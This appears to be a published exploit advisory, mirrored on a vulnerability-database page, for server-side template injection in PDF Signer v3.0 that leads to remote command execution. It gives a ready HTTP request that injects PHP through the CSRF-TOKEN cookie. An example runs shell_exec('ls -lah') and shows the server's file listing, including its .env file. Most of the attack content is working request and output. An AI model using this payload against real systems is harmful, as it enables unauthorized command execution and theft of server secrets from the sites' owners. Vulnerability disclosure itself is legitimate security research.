Vulners
Lucene search
PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)
# Exploit Title: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
# Dork: N/A
# Date: 2019-01-28
# Exploit Author: dd_ ([email protected])
# Vendor Homepage: https://codecanyon.net/user/simcy_creative
# Software Link: https://codecanyon.net/item/signer-create-digital-signatures-and-sign-pdf-documents-online/20737707
# Version: v3.0
# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
# Vendor Banner: Signer v3.0 – Create Digital signatures and Sign PDF documents
# Research IRC: irc.blackcatz.org #blackcatz
# Vulnerability: Server-Side Template Injection leading to Remote Command Execution due to improper Cookie handling and improper CSRF implementation.
# POC:
# 1)
GET / HTTP/1.1
Host: signer.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://signer.local/signin/?secure=true
Connection: close
Cookie: CSRF-TOKEN=rnqvt{{[PHP_COMMAND_HERE]}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
Upgrade-Insecure-Requests: 1
# Example
[REQUEST]
GET / HTTP/1.1
Host: signer.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://signer.local/signin/?secure=true
Connection: close
Cookie: CSRF-TOKEN=rnqvt{{shell_exec('ls -lah')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
Upgrade-Insecure-Requests: 1
[RESPONSE]
--half way down page---snip--
<label>Folder name</label>
<input type="text" class="form-control" name="foldername" placeholder="Folder name" data-parsley-required="true">
<input type="hidden" name="folder" value="1">
<input type="hidden" name="folderid">
<input type="hidden" name="csrf-token" value="rnqvttotal 112K
drwxr-xr-x 9 www-data www-data 4.0K Jan 28 12:04 .
drwxr-xr-x 6 www-data www-data 4.0K Jan 28 06:19 ..
-rw-r--r-- 1 www-data www-data 1.1K Jan 28 12:03 .env
-rw-r--r-- 1 www-data www-data 532 Jan 9 20:52 .htaccess
drwxr-xr-x 9 www-data www-data 4.0K Jan 9 20:53 assets
-rw-r--r-- 1 www-data www-data 947 Jan 9 20:52 composer.json
-rw-r--r-- 1 www-data www-data 54K Jan 9 20:52 composer.lock
drwxr-xr-x 2 www-data www-data 4.0K Jan 28 11:59 config
-rw-r--r-- 1 www-data www-data 1.7K Jan 9 20:52 cron.php
-rw-r--r-- 1 www-data www-data 169 Jan 9 20:52 index.php
drwxr-xr-x 3 www-data www-data 4.0K Jan 9 20:53 lang
drwxr-xr-x 6 www-data www-data 4.0K Jan 28 11:46 src
drwxr-xr-x 9 www-data www-data 4.0K Jan 9 20:53 uploads
drwxr-xr-x 24 www-data www-data 4.0K Jan 9 20:53 vendor
drwxr-xr-x 6 www-data www-data 4.0K Jan 9 20:53 views
to5gw" />
</div>
</div>
</div>
--- snip ---Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jan 2019 00:00Current
7.4High risk
Vulners AI Score7.4